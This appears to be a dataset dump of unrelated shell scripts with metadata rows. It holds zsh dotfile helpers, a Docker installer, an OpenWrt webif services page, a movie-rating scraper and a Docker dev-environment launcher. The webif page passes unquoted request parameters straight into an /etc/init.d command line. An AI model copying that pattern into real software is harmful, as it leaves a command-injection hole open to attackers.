# normalising output to md5sum's "<hash> <file>" shape that the envrc
# machinery stores in ${_ENVRC_SUMFILE}.
# Fixes vs. the previous version: "$@" is quoted (paths with spaces),
# the BSD branch emits one line per file (the old "${@:-1}" appended ALL
# arguments after a single hash), and `command -v` replaces the external
# `which` lookup.
_md5() {
  if command -v md5sum 1>/dev/null 2>/dev/null; then
    md5sum "$@"
  elif command -v md5 1>/dev/null 2>/dev/null; then
    # BSD md5 prints "MD5 (file) = <hash>"; extract the hash per file.
    # NOTE: unlike md5sum, this branch reads nothing from stdin when
    # called with no arguments.
    for _md5_f in "$@"; do
      echo "$(md5 "${_md5_f}" | grep -o "[a-f0-9]\{32\}") ${_md5_f}"
    done
  else
    echo "no md5 checksum tool found" >&2
    return 127
  fi
}
# use gnu tools on macos where available
# Run GNU coreutils variant "g<tool>" when installed, otherwise the plain
# tool. On MacOS a missing g<tool> is treated as fatal (127) because the
# BSD version is not an acceptable substitute there.
# NOTE(review): `whence -p` is a zsh builtin; PLATFORM is expected to be set
# elsewhere in the dotfiles — confirm. Arguments are passed via unquoted $*,
# so args containing spaces will be re-split.
gnu_exec() {
  tool="${1}"
  shift
  case "${PLATFORM}" in
    MacOS)
      if whence -p "g${tool}" 1>/dev/null 2>/dev/null; then
        command "g${tool}" $*
      else
        echo "command not found: g${tool}" >&2
        return 127
      fi
      ;;
    *)
      # Non-mac platforms: prefer g<tool> if present, else fall back.
      if whence -p "g${tool}" 1>/dev/null 2>/dev/null; then
        command "g${tool}" $*
      else
        "${tool}" $*
      fi
      ;;
  esac
}
# GNU sed via gnu_exec: gsed where installed (macOS), plain sed otherwise.
gsed() {
  gnu_exec sed $*
}
# GNU readlink via gnu_exec: greadlink where installed, plain readlink otherwise.
greadlink() {
  gnu_exec readlink $*
}
# set tmux window title
# With arguments: rename the current tmux window to the given title.
# Without arguments: re-enable tmux's automatic window renaming.
# NOTE(review): [ -z "${@}" ] is non-standard for multiple args but works
# for the "no args at all" check used here.
wt() {
  if [ -z "${@}" ]; then
    tmux set-window-option automatic-rename "on" 1>/dev/null
  else
    tmux rename-window "${@}"
  fi
}
# ssh wrapper to set tmux window title
# Renames the current tmux window to the target host for the duration of the
# session, then restores automatic renaming. Outside tmux it is a plain ssh.
ssh() {
  # zsh option: use PCRE for [[ =~ ]] — the hostname regex below needs
  # lookbehind/lookahead.
  setopt RE_MATCH_PCRE
  if [ -n "${TMUX_PANE}" ]; then
    # Find the first argument that looks like [user@]hostname.
    for p; do
      if [[ "${p}" =~ '^([^ ]+@)?([a-zA-Z0-9](?:(?:[a-zA-Z0-9-]*|(?<!-)\.(?![-.]))*[a-zA-Z0-9]+)?)$' ]]; then
        # Strip any leading user@ so only the host lands in the title.
        title="$(echo "${p}" | sed -r 's/^([^ ]+@)?(.+)$/\2/')"
        break
      fi
    done
    wt "${title}"
    command ssh "$@"
    # Argument-less wt re-enables tmux automatic renaming.
    wt
  else
    command ssh "$@"
  fi
}
# invoke ssh and attach/create tmux session on remote host
tssh() {
  # recognise a named session passed as the last argument
  # this is crude, and means that:
  # 1. the named session must be the last argument
  # 2. if any other arguments other than the target host are passed, the session name must also be specified
  # to be fixed up whenever there's nothing else to do
  # (zsh-only slicing: ${@[-1]} is the last arg, ${@:1:-1} everything before it)
  if [ -n "${2}" ]; then
    SESSION_NAME="${@[-1]}"
    SSH_ARGS="${@:1:-1}"
  else
    # Single argument: it is the ssh target; default session name "tom".
    SESSION_NAME=tom
    SSH_ARGS="${@}"
  fi
  # -t forces a tty so the remote tmux can attach; try attach first, then new.
  CMD="ssh -t ${SSH_ARGS[*]} \"bash -l -c 'tmux at -t ${SESSION_NAME} || tmux new -s ${SESSION_NAME}'\""
  eval $CMD
}
# use ssh completion for tssh function
compdef tssh=ssh
# print shell colours
# Prints a grid of every attribute (0-8) / foreground (30-37) /
# background (40-47) ANSI SGR combination, each cell labelled with its own
# escape code, then resets to white-on-black between cells.
shellcolors() {
  for x in {0..8}; do
    for i in {30..37}; do
      for a in {40..47}; do
        echo -ne "\e[$x;$i;$a""m\\\e[$x;$i;$a""m\e[0;37;40m "
      done
      echo
    done
  done
  echo
}
# print the 256 colour palette
# One line per colour code 000-255, rendered via zsh prompt expansion
# (print -P with %F{code}...%f).
prettycolors() {
  for code in {000..255}; do print -P -- "$code: %F{$code}Pretty%f"; done
}
# set a custom suffix for liquidprompt
# With arguments: append "{args}" in blue after the liquidprompt PS1
# (%{...%} marks zero-width escape sequences for prompt width accounting).
# Without arguments: clear the suffix.
prompt_env_suffix() {
  if [ -n "${1}" ]; then
    LP_PS1_POSTFIX=$'%{\e[0;34m%}{'"${*}"$'}%{\e[0m%} '
  else
    LP_PS1_POSTFIX=
  fi
}
#function cd() {
# [[ "${SHELL}" =~ "zsh" ]] && emulate -LR zsh
# builtin cd $@
# result=$?
# last="${@:-1}"
# if [[ $result != 0 ]] && [[ "${last}" =~ "shits" ]]; then
# echo "Did you mean? ${last//shits/shifts}"
# fi
#}
# Name of the per-directory env file and the checksum whitelist of approved
# .envrc files (consumed by source_envrc/envrc below).
_ENVRC=".envrc"
_ENVRC_SUMFILE="${HOME}/.envrc.md5"
# zsh hook: runs after every directory change — (un)load .envrc as needed.
chpwd() {
  source_envrc
}
# zsh hook: before each prompt, set the terminal title to the cwd
# (with $HOME abbreviated to ~) via the OSC 0 escape sequence.
precmd() {
  echo -ne "\033]0;${PWD/#${HOME}/~} \007"
}
# Load/unload the nearest .envrc when the working directory changes.
# Only approved files (md5 listed in ${_ENVRC_SUMFILE}) are sourced; an
# unknown .envrc triggers a warning telling the user to run `envrc allow`.
# Tracks the currently loaded file in the global _ENVRC_SOURCED and calls
# the file-defined envrc_destroy hook (if any) on unload.
source_envrc() {
  [[ "${SHELL}" =~ "zsh" ]] && emulate -LR zsh
  # Only act in interactive top-level shells (skip subshells entirely).
  [[ -o interactive ]] || return 0
  [[ "${ZSH_SUBSHELL}" != "0" ]] && return 0
  rcfile="$(find_up "${_ENVRC}" "${PWD}")"
  # Unload the previous .envrc when we left its subtree (or it vanished).
  [[ -n "${_ENVRC_SOURCED}" ]] && if [[ "${_ENVRC_SOURCED}" != "${rcfile}" ]] || [[ -z "${rcfile}" ]]; then
    echo $'\e[0;32mUnloading '"${_ENVRC_SOURCED}"'\e[0m'
    if typeset -f "envrc_destroy" >/dev/null; then
      envrc_destroy
      unset -f envrc_destroy
    fi
    unset _ENVRC_SOURCED
  fi
  # Load on explicit "reload", or when nothing is loaded yet and a readable
  # .envrc exists (never for $HOME itself).
  if [[ "${1}" == "reload" || ( -z "${_ENVRC_SOURCED}" && "${PWD}" != "${HOME}" && -r "${rcfile}" ) ]]; then
    [[ -f "${_ENVRC_SUMFILE}" ]] || touch "${_ENVRC_SUMFILE}"
    md5="$(_md5 "${rcfile}")"
    # Source only if the exact "hash  path" line is whitelisted.
    if grep -q "^${md5}$" "${_ENVRC_SUMFILE}"; then
      echo $'\e[0;32mSourcing '"${rcfile}"'\e[0m'
      export _ENVRC_SOURCED=$rcfile
      source "${rcfile}"
    else
      echo $'\e[0;31mUnknown '"${_ENVRC}"' found at '"${rcfile}"'. Run `envrc allow` to approve\e[0m' >&2
    fi
  fi
}
# User-facing manager for .envrc approvals.
#   envrc allow  [path] - whitelist the .envrc checksum (prompts per file)
#   envrc reload        - force re-evaluation of the current directory
#   envrc revoke        - remove an entry from the whitelist
envrc() {
  # Resolve which .envrc file(s) we operate on: explicit path ($2) or the
  # nearest one above $PWD.
  if [ -z "${2}" ]; then
    _dir="${PWD}"
    #rcfiles="$(find_up_all "${_ENVRC}" "${PWD}")"
    rcfiles="$(find_up "${_ENVRC}" "${PWD}")"
  else
    _dir="$(\cd "${2%"${_ENVRC}"}" && pwd)"
    rcfiles="${_dir}/${_ENVRC}"
  fi
  case "${1}" in
    "allow")
      while read -r rcfile; do
        if [[ -n "${rcfile}" ]] && [[ -r "${rcfile}" ]]; then
          # vared: zsh interactive line editor used as a y/n prompt.
          vared -p "Allow ${rcfile}? [Y/n]: " -c confirm
          if [[ "${confirm}" == "y" ]]; then
            # Drop any stale entry for this path, then append the new hash.
            gsed -i '\| '"${rcfile}"'$|d' "${_ENVRC_SUMFILE}"
            md5="$(_md5 "${rcfile}")"
            echo "${md5}" >>"${_ENVRC_SUMFILE}"
            echo $'\e[0;34mAllowed '"${rcfile}"'\e[0m'
          fi
          unset confirm
        else
          echo $'\e[0;31m'"${_ENVRC}"' not found at '"${_dir}"'\e[0m' >&2
          return 1
        fi
      done <<<"${rcfiles}"
      # If we approved the current directory's file, load it right away.
      [[ "${_dir}" == "${PWD}" ]] && source_envrc reload
      ;;
    "reload")
      _ENVRC_SOURCED=
      chpwd
      ;;
    "revoke")
      # NOTE(review): ${rcfile} is never assigned on this path (only inside
      # the "allow" loop) — looks like it should use ${rcfiles}; verify.
      if sed -i '\| '"${rcfile}"'$|d' "${_ENVRC_SUMFILE}"; then
        echo $'\e[0;34mRevoked '"${rcfile}"'\e[0m'
      else
        echo $'\e[0;31mError revoking '"${rcfile}"'\e[0m' >&2
      fi
      ;;
  esac
}
# Fetch and pretty-print the TLS certificate of host $1 (port $2, default
# 443). SNI is sent via -servername; "Q" on stdin closes the connection.
showcert() {
  openssl s_client -connect ${1}:${2:-443} -servername ${1} -showcerts <<<"Q" | openssl x509 -text -noout
}
# Switch between pyenv-managed azure-cli installations.
# Usage: az_version <cli-version>; with no argument, lists the installed
# azure-cli virtualenvs. Creates the virtualenv + pip-installs the CLI on
# first use, and swaps ~/.azure config dirs so each version keeps its own.
az_version() {
  # Base python used for every azure-cli virtualenv.
  python_version="3.10.0"
  version="${1}"
  if [[ "${version}" == "" ]]; then
    echo "No version specified!" >&2
    echo "Available versions:" >&2
    pyenv versions | grep "${python_version}/envs/azure-cli-" | sed "s,${python_version}/envs/azure-cli-\([0-9.]*\).*,\1," 1>&2
    return 1
  fi
  new_pyenv_version="${python_version}/envs/azure-cli-${version}"
  old_pyenv_version="$(pyenv version | cut -d' ' -f1)"
  old_version="$(pyenv version | cut -d' ' -f1 | sed "s,${python_version}/envs/azure-cli-,,")"
  #[[ "${new_pyenv_version}" == "${old_pyenv_version}" ]] && return 0
  # Stash the active ~/.azure under a per-version name before switching.
  if [[ -d "${HOME}/.azure" ]]; then
    old_config_version="null"
    [[ -r "${HOME}/.azure/versionCheck.json" ]] && old_config_version="$(jq -r '.versions["azure-cli"].local' <"${HOME}/.azure/versionCheck.json")"
    # NOTE(review): when versionCheck.json is missing this renames the dir
    # to ~/.azure-null — confirm that is intended.
    if [[ "${old_config_version}" == "null" ]]; then
      mv "${HOME}/.azure" "${HOME}/.azure-${old_config_version}"
    else
      mv "${HOME}/.azure" "${HOME}/.azure-${old_version}"
    fi
  fi
  # Create the virtualenv + install the CLI only on first use of a version.
  pyenv versions | grep -q "${new_pyenv_version}" || pyenv virtualenv "${python_version}" "azure-cli-${version}"
  pyenv local "${new_pyenv_version}"
  pip list 2>/dev/null | grep -q "azure-cli" || pip install azure-cli==${version}
  rehash
  # Restore this version's stashed config, if we had one.
  [[ -d "${HOME}/.azure-${version}" ]] && mv "${HOME}/.azure-${version}" "${HOME}/.azure"
  az version
}
# vim: set ft=zsh ts=2 sts=2 sw=2 et:
| true
|
50393fce42f33f00d03b4c85cd5ed0d26172663c
|
Shell
|
FlorianTolk/Dockerized-CouchDB-Standup
|
/install.sh
|
UTF-8
| 1,316
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# Simple script to install Docker
# Print a framed banner announcing which component ($1) is being installed.
function announce() {
    printf '%s\n' \
        "" \
        "#====================================================#" \
        "#" \
        "#    Installing $1" \
        "#" \
        "#====================================================#"
}
# Check for sudo
#
# apt-get needs root; exit non-zero so callers can detect the failure
# (previously this printed an "Installing ..." banner and exited 0).
if [ "$EUID" -ne 0 ]; then
    echo "Please run as root!" >&2
    exit 1
fi

# Curl
#
announce "Curl"
if ! [ -x "$(command -v curl)" ]; then
    # Curl is easy; -y keeps the script non-interactive, matching the
    # docker-ce install below.
    apt-get install -y curl
else
    echo "Skipping, Curl already installed!"
fi

# Docker
#
announce "Docker"
if ! [ -x "$(command -v docker)" ]; then
    # Docker is a bit complicated
    #
    # Add the GPG Key
    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -

    # Add the Docker repository to our APT sources
    add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"

    # With those added, update our packages
    apt-get update

    # Since we're up to date, get docker
    apt-get install -y docker-ce
else
    echo "Skipping, docker already installed!"
fi

echo "Docker should all be ready."
echo ""

# Prompt loop: keep asking until the user answers y/Y or n/N.
while true; do
    # -r keeps backslashes in the answer literal.
    read -r -p "Do you wish to initialize couchDB? <Y/N>" yn
    case $yn in
        [Yy]* ) bash ./startDocker.sh; break;;
        [Nn]* ) exit;;
        * ) echo "Please answer using y or n.";;
    esac
done
| true
|
65e70b202598b3c2daa888bf9f4c89c01211b3f0
|
Shell
|
guozhan1722/SomeOldSrcCode
|
/webif/files/www/cgi-bin/webif/system-services.sh
|
UTF-8
| 4,642
| 3.171875
| 3
|
[] |
no_license
|
#!/usr/bin/webif-page
<%
. /usr/lib/webif/webif.sh
###################################################################
# Services
#
# Description:
# Services control page.
# This page enables the user to enable/disabled/start
# and stop the services in the directory /etc/init.d
#
# Author(s) [in order of work date]:
# m4rc0 <jansssenmaj@gmail.com>
#
# Major revisions:
# 2008-11-08 - Initial release
#
# Configuration files referenced:
# none
#
# Required components:
#
header "System" "Services" "@TR<<Services>>" '' "$SCRIPT_NAME"
# change rowcolors
# Alternate table-row striping: flips the global ${cur_color} between
# "odd" and "even" on every call and emits the matching <tr> opening tag.
# NOTE(review): `equal` is a helper sourced from webif.sh — presumably
# string equality; confirm.
get_tr() {
	if equal "$cur_color" "odd"; then
		cur_color="even"
		echo "<tr>"
	else
		cur_color="odd"
		echo "<tr class=\"odd\">"
	fi
}
#check if a service with an action is selected
# When the CGI query supplied both ?service= and ?action=, run the matching
# /etc/init.d script before rendering the page; all output is discarded.
# NOTE(review): FORM_service/FORM_action come straight from the request and
# are expanded unquoted into a command line — this trusts the web UI input.
if [ "$FORM_service" != "" ] && [ "$FORM_action" != "" ]; then
	/etc/init.d/$FORM_service $FORM_action > /dev/null 2>&1
fi
cat <<EOF
<h3><strong>@TR<<Available services>></strong></h3>
<table style="width: 90%; margin-left: 2.5em; text-align: left; font-size: 0.8em;" border="0" cellpadding="2" cellspacing="1" summary="@TR<<Services>>">
<tr>
<td>
<table style="margin-left: 2.5em; text-align: left;" border="0" cellpadding="2" cellspacing="1" summary="@TR<<Services>>">
EOF
# set the color-switch
cur_color="odd"
#for each service in init.d.....
for service in $(ls /etc/init.d | grep -v "rcS") ; do
# select the right color
get_tr
#check if current $service is in the rc.d list
if [ -x /etc/rc.d/S??${service} -o -x /etc/rc.d/K??${service} ] ; then
echo "<td><img width=\"17\" src=\"/images/service_enabled.png\" alt=\"Service Enabled\" /></td>"
else
echo "<td><img width=\"17\" src=\"/images/service_disabled.png\" alt=\"Service Disabled\" /></td>"
fi
cat <<EOF
<td> </td>
<td>${service}</td>
<td><img height="1" width="100" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=enable"><img width="13" src="/images/service_enable.png" alt="Enable Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=enable">@TR<<system_services_service_enable#Enable>></a></td>
<td><img height="1" width="5" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=disable"><img width="13" src="/images/service_disable.png" alt="Disable Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=disable">@TR<<system_services_service_disable#Disable>></a></td>
<td><img height="1" width="60" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=start"><img width="13" src="/images/service_start.png" alt="Start Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=start">@TR<<system_services_sevice_start#Start>></a></td>
<td><img height="1" width="5" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=restart"><img width="13" src="/images/service_restart.png" alt="Restart Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=restart">@TR<<system_services_service_restart#Restart>></a></td>
<td><img height="1" width="5" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=stop"><img width="13" src="/images/service_stop.png" alt="Stop Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=stop">@TR<<system_services_service_stop#Stop>></a></td>
</tr>
EOF
done
cat <<EOF
</table>
</td>
<td valign="top">
<table style="margin-left: 2.5em; text-align: left;" border="0" cellpadding="2" cellspacing="1" summary="@TR<<Services>>">
<tr>
<td><img width="17" src="/images/service_enabled.png" alt="Service Enabled" /></td>
<td>@TR<<system_services_service_enabled#Service Enabled>></td>
</tr>
<tr>
<td><img width="17" src="/images/service_disabled.png" alt="Service Disabled" /></td>
<td>@TR<<system_services_service_disabled#Service Disabled>></td>
</tr>
<tr><td colspan="2"> </td></tr>
EOF
#if there is a service and an action selected... display status
if [ "$FORM_service" != "" ] && [ "$FORM_action" != "" ]; then
	# Map the action verb to its past tense for the confirmation message.
	case "$FORM_action" in
		enable) status="enabled";;
		disable) status="disabled";;
		start) status="started";;
		restart) status="restarted";;
		stop) status="stopped";;
	esac
	cat <<EOF
<tr>
	<td colspan="2">
		<strong>Service ${FORM_service} was ${status}</strong>
	</td>
</tr>
EOF
fi
cat <<EOF
</table>
</td>
</tr>
</table>
EOF
footer %>
#<!--
###WEBIF:name:System:140:Services
#-->
| true
|
973ead8ac3a2034b22d13a6648d45e45c8908f37
|
Shell
|
AnuvrathElastica/scaling-enigma
|
/monitor/build_docker_image.sh
|
UTF-8
| 196
| 3.25
| 3
|
[] |
no_license
|
#!/bin/bash
set -e

# Build a Docker image named after the current directory, tagged with the
# version passed as $1 (default: "latest").
IMAGE_NAME=$(basename "$PWD")

# Quoted test: the old `[ -z $1 ]` broke when $1 contained spaces or globs.
if [ -z "$1" ] ; then
    ELASTICA_VERSION="latest"
else
    ELASTICA_VERSION="$1"
fi

sudo docker build --rm . -t "${IMAGE_NAME}":"${ELASTICA_VERSION}"
| true
|
9910e348fd8c27e7dea13279c01b89c73fb41b90
|
Shell
|
shwaka/kotlin-publish
|
/install.sh
|
UTF-8
| 169
| 2.671875
| 3
|
[] |
no_license
|
#! /bin/bash
# Publish each example project to the local Maven repository.
# Every build runs inside a subshell so the cd never leaks out.
for project in example-lib example-mplib; do
    (
        echo "--- Install $project ---"
        cd "$project"
        ./gradlew publishToMavenLocal
        echo
    )
done
| true
|
53d4bbb4f4642792a5501a78e63f27d18c7de7e9
|
Shell
|
lSoleyl/linux_utils
|
/lib/require-lib.sh
|
UTF-8
| 570
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
# A small script, which checks whether a binary is present and if not,
# prompts the user to install it
# Usage require-lib.sh <binary> [packetname (if different)]
if [ -z "$1" ]; then
  echo "Usage: $(basename "$0") <binary> [packetname (if different)]"
else
  program=$1
  # Package name defaults to the binary name when not given separately.
  [ -z "$2" ] && packet=$program || packet=$2
  # command -v replaces the external `which` lookup.
  command -v "$program" > /dev/null && exit 0 # Quit program if packet exists
  # -r keeps backslashes literal; $yn is quoted below so an empty answer no
  # longer crashes the test with "unary operator expected".
  read -r -p "Packet $packet is missing, should it be installed now? (y/n)" yn
  if [ "$yn" == "y" ]; then
    sudo apt-get install "$packet"
    exit $?
  fi
  exit 1
fi
| true
|
336190aaa4316dc07eb1c990363a3cd4a89297b4
|
Shell
|
nielsbasjes/yauaa
|
/start-docker.sh
|
UTF-8
| 5,532
| 3.65625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Yet Another UserAgent Analyzer
# Copyright (C) 2013-2023 Niels Basjes
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )"
echo "PWD: ${SCRIPTDIR}"
cd "${SCRIPTDIR}" || ( echo "This should not be possible" ; exit 1 )
PROJECTNAME=yauaa
USER=$(id -un)
CONTAINER_NAME=${PROJECTNAME}-devtools-${USER}-$$
DOCKER_BUILD="docker build"
if [ -n "${INSIDE_DOCKER+x}" ];
then
echo "Nothing to do: You are already INSIDE the docker environment"
exit 1;
fi
if [[ "$(docker images -q ${PROJECTNAME}-devtools 2> /dev/null)" == "" ]]; then
# DOCKER_BUILD="docker build"
cat << "Welcome-message"
_____ _ _ _ _ _
/ ___| | | | | (_) (_) | |
\ `--. ___| |_| |_ _ _ __ __ _ _ _ _ __ ___ _ ____ ___ _ __ ___ _ __ _ __ ___ ___ _ __ | |_
`--. \/ _ \ __| __| | '_ \ / _` | | | | | '_ \ / _ \ '_ \ \ / / | '__/ _ \| '_ \| '_ ` _ \ / _ \ '_ \| __|
/\__/ / __/ |_| |_| | | | | (_| | | |_| | |_) | | __/ | | \ V /| | | | (_) | | | | | | | | | __/ | | | |_
\____/ \___|\__|\__|_|_| |_|\__, | \__,_| .__/ \___|_| |_|\_/ |_|_| \___/|_| |_|_| |_| |_|\___|_| |_|\__|
__/ | | |
|___/ |_|
For building Yet Another UserAgent Analyzer
This will take a few minutes...
Welcome-message
else
# DOCKER_BUILD="docker build -q"
echo "Loading Yauaa development environment"
fi
${DOCKER_BUILD} -t ${PROJECTNAME}-devtools devtools/docker/
buildStatus=$?
if [ ${buildStatus} -ne 0 ];
then
echo "Building the docker image failed."
exit ${buildStatus}
fi
# Resolve the user/group the dev container should run as. On Linux prefer
# the invoking user even under sudo (SUDO_USER, falling back to USER);
# elsewhere (boot2docker VMs) use its fixed uid 1000 / gid 50.
if [ "$(uname -s)" == "Linux" ]; then
  USER_NAME=${SUDO_USER:=${USER}}
  USER_ID=$(id -u "${USER_NAME}")
  GROUP_ID=$(id -g "${USER_NAME}")
else # boot2docker uid and gid
  USER_NAME=${USER}
  USER_ID=1000
  GROUP_ID=50
fi
EXTRA_DOCKER_STEPS=""
if [ -f "${HOME}/.gitconfig" ];
then
cp "${HOME}/.gitconfig" ___git_config_for_docker
EXTRA_DOCKER_STEPS="ADD ___git_config_for_docker /home/${USER}/.gitconfig"
fi
DOCKER_GROUP_ID=$(getent group docker | cut -d':' -f3)
cat - > ___UserSpecificDockerfile << UserSpecificDocker
FROM ${PROJECTNAME}-devtools
RUN bash /scripts/configure-for-user.sh "${USER_NAME}" "${USER_ID}" "${GROUP_ID}" "$(grep -F vboxsf /etc/group)"
#RUN groupmod -g ${DOCKER_GROUP_ID} docker
${EXTRA_DOCKER_STEPS}
UserSpecificDocker
${DOCKER_BUILD} -t "${PROJECTNAME}-devtools-${USER_NAME}" -f ___UserSpecificDockerfile .
buildStatus=$?
if [ ${buildStatus} -ne 0 ];
then
echo "Building the user specific docker image failed."
exit ${buildStatus}
fi
rm -f ___git_config_for_docker ___UserSpecificDockerfile
echo ""
echo "Docker image build completed."
echo "=============================================================================================="
echo ""
# Do NOT Map the real ~/.m2 directory !!!
[ -d "${PWD}/devtools/docker/_m2" ] || mkdir "${PWD}/devtools/docker/_m2"
[ -d "${PWD}/devtools/docker/_gnupg" ] || mkdir "${PWD}/devtools/docker/_gnupg"
MOUNTGPGDIR="${PWD}/devtools/docker/_gnupg"
if [[ "${1}" == "RELEASE" ]];
then
cp "${HOME}"/.m2/*.xml "${PWD}/devtools/docker/_m2"
MOUNTGPGDIR="${HOME}/.gnupg"
echo "Setting up for release process"
fi
DOCKER_INTERACTIVE_RUN=${DOCKER_INTERACTIVE_RUN-"-i -t"}
DOCKER_SOCKET_MOUNT=""
if [ -S /var/run/docker.sock ];
then
DOCKER_SOCKET_MOUNT="-v /var/run/docker.sock:/var/run/docker.sock${V_OPTS:-}"
echo "Enabling Docker support with the docker build environment."
else
echo "There is NO Docker support with the docker build environment."
fi
COMMAND=( "$@" )
if [ $# -eq 0 ];
then
COMMAND=( "bash" "-i" )
DOCKER_INTERACTIVE="-i -t"
else
DOCKER_INTERACTIVE="-i"
fi
# man docker-run
# When using SELinux, mounted directories may not be accessible
# to the container. To work around this, with Docker prior to 1.7
# one needs to run the "chcon -Rt svirt_sandbox_file_t" command on
# the directories. With Docker 1.7 and later the z mount option
# does this automatically.
# Since Docker 1.7 was release 5 years ago we only support 1.7 and newer.
V_OPTS=:z
docker run --rm=true ${DOCKER_INTERACTIVE} \
-u "${USER_NAME}" \
-v "${PWD}:/home/${USER_NAME}/${PROJECTNAME}${V_OPTS:-}" \
-v "${HOME}/.m2:/home/${USER_NAME}/.m2${V_OPTS:-}" \
-v "${PWD}/devtools/docker/toolchains.xml:/home/${USER_NAME}/.m2/toolchains.xml" \
-v "${MOUNTGPGDIR}:/home/${USER_NAME}/.gnupg${V_OPTS:-}" \
${DOCKER_SOCKET_MOUNT} \
-w "/home/${USER}/${PROJECTNAME}" \
-p 1313:1313 \
--name "${CONTAINER_NAME}" \
"${PROJECTNAME}-devtools-${USER_NAME}" \
"${COMMAND[@]}"
exit 0
| true
|
cd40086342ecaa021b251e109d848b794caac36f
|
Shell
|
angelo-malatacca/AWS-Utility-Scripts
|
/ec2-check.sh
|
UTF-8
| 1,006
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# Iterate over every available AWS region and pretty-print the EC2 instances
# found there. Requires a configured AWS CLI and jq.
echo ""
echo "This script shows you all the instances"
echo "in all the AWS available regions"
echo ""

# describe-regions --output text puts the region name in column 4.
for region in $(aws ec2 describe-regions --output text | cut -f4)
do
	echo -e "\nListing Instances in region: $region:"
	# First pass includes the Name tag; instances without tags make the
	# .Tags[] lookup fail, hence the tag-less second pass below.
	echo "first check:..."
	aws ec2 describe-instances --region "$region" | jq '.Reservations[] | ( .Instances[] | {state: .State.Name, "Launch time": .LaunchTime, Name: .Tags[].Value, "Instance Id": .InstanceId, "InstanceType": .InstanceType, Key: .KeyName, "Availability zone": .Placement.AvailabilityZone, "Private IP": .PrivateIpAddress, "Public Ip": .PublicIpAddress})'
	# Second pass: same fields minus the tag lookup, so untagged instances
	# are still listed.
	echo "second check:..."
	aws ec2 describe-instances --region "$region" | jq '.Reservations[] | ( .Instances[] | {state: .State.Name, "Launch time": .LaunchTime, "Instance Id": .InstanceId, "InstanceType": .InstanceType, Key: .KeyName, "Availability zone": .Placement.AvailabilityZone, "Private IP": .PrivateIpAddress, "Public Ip": .PublicIpAddress})'
done
| true
|
08d27a3b89cb37f378a5ca7dcbb01016e56952c6
|
Shell
|
shovonis/IdeaProject
|
/therap_training/movies/movie.sh
|
UTF-8
| 1,164
| 2.625
| 3
|
[] |
no_license
|
#clearing the shell
clear
#movielist
# One "name/" entry per sub-directory of $PWD; each is treated as a movie
# title to look up. Start with a fresh report file.
ls -d */ > movielist
rm -fr ratings.html
echo "<head>
<style>
#customers
{
font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;
width:100%;
border-collapse:collapse;
}
#customers td, #customers th
{
font-size:1em;
border:1px solid #98bf21;
padding:3px 7px 2px 7px;
}
#customers th
{
font-size:1.1em;
text-align:left;
padding-top:5px;
padding-bottom:4px;
background-color:#A7C942;
color:#ffffff;
}
#customers tr.alt td
{
color:#000000;
background-color:#EAF2D3;
}
</style>
</head>
<body>
" >> ratings.html
echo "<table id="customers">
<tr>
<th>Movies</th>
<th>Ratings</th>
</tr>" >> ratings.html
# For every movie directory: google the title, scrape a "Rating: x.y/10"
# snippet out of the results, and append a table row linking the directory.
while read line
do
echo "<tr class="alt">" >> ratings.html
# Fetch the search results page (wget log goes to tmp, page to search_result.html).
wget -O search_result.html -o tmp --user-agent Mozilla "http://www.google.ca/search?q=${line}"
echo "<td><a href=\"`pwd`/$line\">$line</a></td>" >> ratings.html
echo "<td>" >> ratings.html
# Extract the numeric part of "Rating: x.y/10" (bytes 9-14 of the match).
grep -i -o "Rating:[ ][0-9][.]*[0-9]*[/][0-9][0-9]" search_result.html | cut -b 9-14 >> ratings.html
echo "</td>" >> ratings.html
echo "</tr>" >> ratings.html
done < movielist
echo "</table>
</body>
</html>" >> ratings.html
| true
|
d9e299c383d2977c277b26fa23dbba59b0f75618
|
Shell
|
adadgio/deploy
|
/clean.sh
|
UTF-8
| 2,144
| 3.765625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Bash deploy script. Copyright (c) 2017 Romain Bruckert
# https://kvz.io/blog/2013/11/21/bash-best-practices/

###
# Check input arguments
# (this block used to appear twice, verbatim; validated once now)
##
if [ -z "${ENV}" ]; then
    echo -e "${red}✗ No argument supplied for environment (-e|--env|--environment)${nc}"
    exit 1
fi

if [ -z "${VERSION}" ]; then
    echo -e "${red}✗ No argument supplied for version (-v|--version)${nc}"
    exit 1
fi

echo -e "${green}★ Starting cleaning util${nc}"

# Default to non-debug mode when the caller did not set DEBUG.
if [ -z "${DEBUG}" ]; then
    DEBUG='--no-debug'
fi

# This utility has been retired; fail fast so automation notices.
echo "DEPRECATED"
exit 2
#
# REMOTE_VERSION_NUMBER=$(ssh ${CNF_USER}@${CNF_HOST} "cat ${CNF_BASE_REMOTE_DIR}/${LIVEDIR}/.version.${ENV}")
#
# # Makee sur deploying a same version is allowed (ask the developer)
# if [ ${VERSION} = ${REMOTE_VERSION_NUMBER} ]; then
# echo -e "${red}✗ Cant remove a live version${nc}"
# exit 0
# else
#
# ###
